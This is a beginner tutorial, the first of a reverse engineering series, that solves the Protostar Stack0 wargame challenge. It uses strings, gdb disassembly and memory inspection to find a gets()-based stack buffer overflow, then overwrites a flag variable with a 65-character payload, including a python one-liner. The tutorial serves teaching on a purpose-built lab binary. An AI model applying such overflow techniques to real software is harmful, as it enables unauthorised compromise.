What is this about?#

This article is the 1st part of the Practical Reverse Engineering Tutorials series. This series is geared towards a structured, but almost completely practical, approach to learn Reverse Engineering. Many of the existing articles/books take a long winded approach to teach RE which is prefixed with a lot of theory before the reader can get their hands dirty. This series will take a different approach of picking up various challenges in the order of increasing difficulty and help the reader in exploring ways how to break them. I’ll try to keep mundane theory limited to the portions needed to beat the current challenge in consideration. Hopefully, this keeps the articles short, precise and interesting enough for readers to keep their attention span intact.

I’d like to believe that these articles will prove helpful to those who are completely new to the world of reverse engineering. But I hope that even intermediate level readers would be able to make use of these by picking up the articles according to their appropriate levels.

Pre-requisite for these articles is basic knowledge of programming concepts, prefereably C. Any kind of prior experience with any assembly language is good but not mandatory.

For any queries, suggestions or feedback, please leave a comment here or ping me @shantanugoel

Exploit Exercises / Protostar#

For the first few articles of this series, we’ll work through some of the challenges from Exploit Exercises, starting with Protostar.

Note that although most of the challenges on exploit exercises provide source code of the challenge, we’d try to hack our way using purely reverse engineering as much as possible without looking at the source code. This would lead to better learning and avoid guiding you towards the solution pre-maturely. I strongly recommend that you do not look at the C source unless you’ve completed the below artcile fully or are not able to make connection to the assembly code at all after serious effort.

Setup#

To create the setup, follow the below steps:

  • Download the Protostar ISO file from https://exploit-exercises.com/download/
  • Download and install VMWare Workstation Player or VirtualBox
  • Create a new virtual machine in the vm software you downloaded using the nebula ISO from the first step
  • The iso is a live CD, so you can boot from it directly, instead of having to install it in the VM

We’re all set now to begin

Stack 0#

Stack0 is the first challenge in protostar.

Preparing for the challenge#

The webpage says that the challenge is located at /opt/protostar/bin/stack0, so login to the VM and run this program. It looks like it is waiting for some input. On entering any data, it seems to tell us we were wrong with a message Try again?

user@protostar:/opt/protostar/bin$ ./stack0
asd
Try again?
user@protostar:/opt/protostar/bin$ 

We run strings command on the stack0 program to find out interesting text present in it, and see another one you have changed the 'modified' variable, which seems to be our target.

user@protostar:/opt/protostar/bin$ strings stack0
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
gets
puts
__libc_start_main
GLIBC_2.0
PTRh@
[^_]
you have changed the 'modified' variabley
Try again?
user@protostar:/opt/protostar/bin$ 

Static Analysis#

Now that we know what we need to achieve, we start our reverse engineering by doing static analysis of the program. There are several utilities to look at the low level code of the program. However, we will be using gdb here which can help us later in dynamic analysis as well. gdb or The GNU Project Debugger is a popular open source debugger. We’ll graduate to more powerful tools or use reverse engineering oriented plugins for gdb later, but for now a vanilla gdb will do. It is already installed in the protostar VM. A debugger allows us to examine the internal state of the program as it executes at instruction/register level.

Some of the important commands that you’d use during the static analysis for this challenge are:

set disassembly-flavor intel: While this is optional, but it allows to see the disassembled code in a more readable format.

disassemble <function>: This command displays the disassembled code of function

You can read more about these commands at https://sourceware.org/gdb/current/onlinedocs/gdb/ or http://visualgdb.com/gdbreference/commands/

Using the above information, we load the stack0 executable in GDB and disassemble the function main.

user@protostar:/opt/protostar/bin$ gdb stack0
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack0...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>:	push   ebp
0x080483f5 <main+1>:	mov    ebp,esp
0x080483f7 <main+3>:	and    esp,0xfffffff0
0x080483fa <main+6>:	sub    esp,0x60
0x080483fd <main+9>:	mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:	lea    eax,[esp+0x1c]
0x08048409 <main+21>:	mov    DWORD PTR [esp],eax
0x0804840c <main+24>:	call   0x804830c <gets@plt>
0x08048411 <main+29>:	mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:	test   eax,eax
0x08048417 <main+35>:	je     0x8048427 <main+51>
0x08048419 <main+37>:	mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:	call   0x804832c <puts@plt>
0x08048425 <main+49>:	jmp    0x8048433 <main+63>
0x08048427 <main+51>:	mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:	call   0x804832c <puts@plt>
0x08048433 <main+63>:	leave  
0x08048434 <main+64>:	ret    
End of assembler dump.
(gdb) 

Making sense of the assembly code#

Well, so we got a….big pile of gibberish? So, this is how assembly code looks like. Very different from a regular C program, as you can see. On the left side, you can see the memory addresses where a particular instruction is present and on the right side the instruction. Each instruction is again composed of two parts:

  • The instruction itself
  • 0 or more operands (which can be addresses or registers with some specific formatting that we will learn as we encounter it)

Now, although this is a small enough program, as good reverse engineers, we rarely go through the whole program immediately which would require us to know each assembly instruction as well as take a lot of time. So, instead we will make some intelligent guesses and look at only the instructions/code that we really need to know. Just know these basic things before moving forward:

  • Any instruction that works on some data either takes one or more addresses and/or registers as operands, which it operates on
  • A register like eax is a basically a temporary/scratch memory close to the CPU for getting fast access to a data being used locally frequently
  • There are few special registers. For current problem, know that ebp is the Stack Base pointer or the bottom of current stack frame, esp is the stack pointer or the current top of the stack, eip is the instruction pointer or the address of the instruction which is just about to be executed. We’ll learn more about the ebp/esp when we do a real stack overflow problem
  • A square bracket [] around a address or register signifies that the instruction refers to the value present in that address/register as the source or destination of the operation instead of the address/register itself.
  • For most operations involving a source and destination operand, the left operand is the destination.

If you face problem in understanding the below information and think you need to understand x86 assembly a bit more before moving forward, you can use this very short and simple guide for the same: https://www.cs.virginia.edu/~evans/cs216/guides/x86.html

Many times, my first intuition is to find out the areas in code which lead to our success/failure cases and work backwards from there. From our preparation phase, we saw that the failure case printed a message Try again? on the screen and the success case was potentially a message you have changed the 'modified' variable. Skimming over the code quickly, you will notice 3 peculiar statements that you may already be familiar from your C programming.

0x0804840c <main+24>:	call   0x804830c <gets@plt>
...
0x08048420 <main+44>:	call   0x804832c <puts@plt>
...
0x0804842e <main+58>:	call   0x804832c <puts@plt>

If you don’t remember what gets and puts do, you can look at their descriptions from their manpages (e.g. man puts). In brief, gets allows you to capture user input from stdin and puts allows you to print output to stdout to display to the user. This matches with our observations in the previous section that it waited for user input when we ran the program and gave an error message on receiving the input. We also saw a 2nd string which was potentially the success message. So we have 1 gets and 2 puts statements corresponding to this, but we don’t know yet which one of the 2 puts statements is the success part and which one is the failure part.

Anyways, we start moving a bit backwards from the first puts statement and try to make sense of each instruction:

0x08048420 <main+44>:	call   0x804832c <puts@plt>

Here, the call instruction refers to calling a function specified by the address 0x804832c. The string inside <> is the disassembler telling you the symbol name associated with that address.

0x08048419 <main+37>:	mov    DWORD PTR [esp],0x8048500

Here, the mov instruction is moving the value 0x8048500 into the address pointed by the register esp. The X86 calling convention puts the arguments to a function onto the stack before calling it and here the esp is the “Stack pointer” register. So, this must be the address of the string being passed to puts that it must print. Keep this address 0x8048500 in mind for our next section (Dynamic Analysis).

0x08048411 <main+29>:	mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:	test   eax,eax
0x08048417 <main+35>:	je     0x8048427 <main+51>

Here we see that first we move some data from the address esp + 0x5c into eax. then the test instruction checks whether eax is zero or not. It does this by AND’ing the left and right operand. Since eax is the left as well as the right operand, the AND result will be zero only if eax is zero. Then the je (or jump if equal to) instruction will jump the program execution to the address 0x8048427 (i.e. it will skip the first puts statement and start executing near our 2nd puts statement) if eax was zero. Otherwise it will execute the first puts statement. It decides the “equal to” condition by looking at an internal flag called Zero Flag (or Z or ZF) and treats equals condition to be true if this flag is set. This is because a test or a cmp (compare) instruction will set the ZF to 1 if result of the AND of 2 operands (in case of test) or difference of 2 operands (in case of cmp) was 0.

This seems like our decision maker code as if we can manipulate the value at [esp+0x5c] then we can control the flow of the program to either of the puts statements. So, let’s keep this address in mind for our dynamic analysis.

0x08048405 <main+17>:	lea    eax,[esp+0x1c]
0x08048409 <main+21>:	mov    DWORD PTR [esp],eax
0x0804840c <main+24>:	call   0x804830c <gets@plt>

Finally we reach the user input call. lea instruction means “Load effective address”. It is a slightly tricky instruction in the sense that:

  • it does the calculations only on the right side operand, not both and then stores the result in left operand
  • the square brackets [] don’t really refer to the meaning that we know from other instructions (i.e. you dont need to find out further the value present at calculated address and can just ignore the [])

Combining this knowledge with the semantics of mov/call that we learnt earlier, we know that the program is collecting the user input and storing that into a location starting at esp+0x1c.

0x080483fd <main+9>:	mov    DWORD PTR [esp+0x5c],0x0

And then we come to this instruction which looks a bit familiar to us because we’ve already seen that address esp+0x5c earlier. So, this seems like the initialization statement for a variable which is set to 0 and then later checked whether it is still 0 or not.

The vulnerability#

Our task then is to make this variable (at location esp+0x5c) 0 or non-zero depending on what do the 2 puts statements do. The only access to influence the program we have is through the input we can give to gets. Hmm, so we dig deeper into the gets manpage and we see below:

gets()  reads  a  line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte ('\0').  No check for buffer overrun is performed (see BUGS below).

Great! So we know that we need to update a value at address esp+0x5c and we know that we have a possibility to have unchecked writes done starting from esp+0x1c. You know where this is going, and we almost don’t even need further dynamic analysis to crack this now. But I’ll take you through a bit of dynamic analysis for a brief introduction to it and for confirming our theory.

Dynamic Analysis#

While in static analysis we carry out all our inspections without running the program, in dynamic analysis we monitor the internal state of the program while it is running. For this, we will run the program inside gdb. You should know the following basic commands for this:

r: Run the currently loaded program from beginning

b *<address>: Put a breakpoint at <address> so that the program stops execution when it reaches that address.

c: Continue execution

info r: This displays the current state of the CPU’s general purpose registers

x/<n><s> <address/register>: This allows to examine the process memory at the given address or address contained in register. You can use various switches <s> with it to display a specific amount of memory and in a specific format. e.g., /i displays the memory as instructions, /x as hex, /s as strings, etc. The number <n> is used to display n units of memory

Now, before we run the program, recall that we had 2 puts calls in our assembly code and we didn’t know which one was the success case and which was failure. So we simply try to read the strings present at the addresses which were passed to the puts calls.

(gdb) x/s 0x8048500
0x8048500:	 "you have changed the 'modified' variable"
(gdb) x/s 0x8048529
0x8048529:	 "Try again?"
(gdb) 

So we knnow that our first puts call is the success case and the second one is failure. Now, our observation was that if the value at esp+0x5c was 0, then it goes to the second puts call and otherwise it goes to first. So, we have to somehow make this value non-zero to get success.

We know that our area of interest is in the gets call through which we can manipulate the program memory. So let’s put couple of breakpoints, 1 before gets and 1 after and then run the program.

(gdb) b *0x0804840c
Breakpoint 1 at 0x804840c: file stack0/stack0.c, line 11.
(gdb) b *0x08048411
Breakpoint 2 at 0x8048411: file stack0/stack0.c, line 13.
(gdb) r
Starting program: /opt/protostar/bin/stack0 

Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffff864)
    at stack0/stack0.c:11
11	stack0/stack0.c: No such file or directory.
	in stack0/stack0.c
(gdb) 

Now, we are stopped right before executing the gets call. We know that the input is taken at esp+0x1c and the target variable is located at esp+0x5c. So, let’s see the state of the program memory around these areas.

(gdb) x/30x $esp
0xbffff750:	0xbffff76c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffff760:	0xb7fd7ff4	0xb7ec6165	0xbffff778	0xb7eada75
0xbffff770:	0xb7fd7ff4	0x08049620	0xbffff788	0x080482e8
0xbffff780:	0xb7ff1040	0x08049620	0xbffff7b8	0x08048469
0xbffff790:	0xb7fd8304	0xb7fd7ff4	0x08048450	0xbffff7b8
0xbffff7a0:	0xb7ec6365	0xb7ff1040	0x0804845b	0x00000000
0xbffff7b0:	0x08048450	0x00000000	0xbffff838	0xb7eadc76
0xbffff7c0:	0x00000001	0xbffff864

This shows us that the stack pointer is at 0xbffff750, the value at esp+0x1c (i.e. 0xbffff76c) is some non-zero value and the value at esp+0x5c (i.e. 0xbffff7ac) is 0 (matches the variable initialization value). Let’s continue further to the next step, enter some known data as input and see the state of memory again.

(gdb) c
Continuing.
AAAAAAAAAAAA

Breakpoint 2, main (argc=1, argv=0xbffff864) at stack0/stack0.c:13
13	in stack0/stack0.c
(gdb) x/30x $esp
0xbffff750:	0xbffff76c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffff760:	0xb7fd7ff4	0xb7ec6165	0xbffff778	0x41414141
0xbffff770:	0x41414141	0x41414141	0xbffff700	0x080482e8
0xbffff780:	0xb7ff1040	0x08049620	0xbffff7b8	0x08048469
0xbffff790:	0xb7fd8304	0xb7fd7ff4	0x08048450	0xbffff7b8
0xbffff7a0:	0xb7ec6365	0xb7ff1040	0x0804845b	0x00000000
0xbffff7b0:	0x08048450	0x00000000	0xbffff838	0xb7eadc76
0xbffff7c0:	0x00000001	0xbffff864
(gdb)

We entered AAAAAAAAAAAA as the input, i.e., 12 ‘A’ characters as input and notice that 12 bytes starting from 0xbffff76c onwards now reflect as 0x41 (which is the ascii value of A). So if we enter more number of As, we can continue overwriting more memory locations with 0x41 till we reach esp+0x5c. We can find the distance between the input variable and output variable addresses by doing this simple calculation of (esp+0x5c - esp+0x1c) or (0xbffff7ac - 0xbffff76c) which comes out to be 0x40 or 64. So, we need to input more than 64 As into the program to modify the variable and get the desired result.

Try this out now on regular command line:

user@protostar:/opt/protostar/bin$ ./stack0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have changed the 'modified' variable

or if you know python

user@protostar:/opt/protostar/bin$ python -c 'print "A"*65' | ./stack0
you have changed the 'modified' variable

SUCCESS!

References / Lessons learnt#

So, in this article, we learnt:

  • About a very basic buffer overflow on the stack and how to exploit it.
  • Static and dynamic analysis portions of reverse engineering
  • strings command
  • Introduction to x86 assembly
  • Several gdb commands
  • We also learnt that usage of gets function is very dangerous as it doesn’t have any kind of check on the amount of input coming from the user versus the space we have to save it.

You can refer to the below links for reading up more about some of the things discussed above. If you have any queries or suggestions, please leave a comment here or ping me @shantanugoel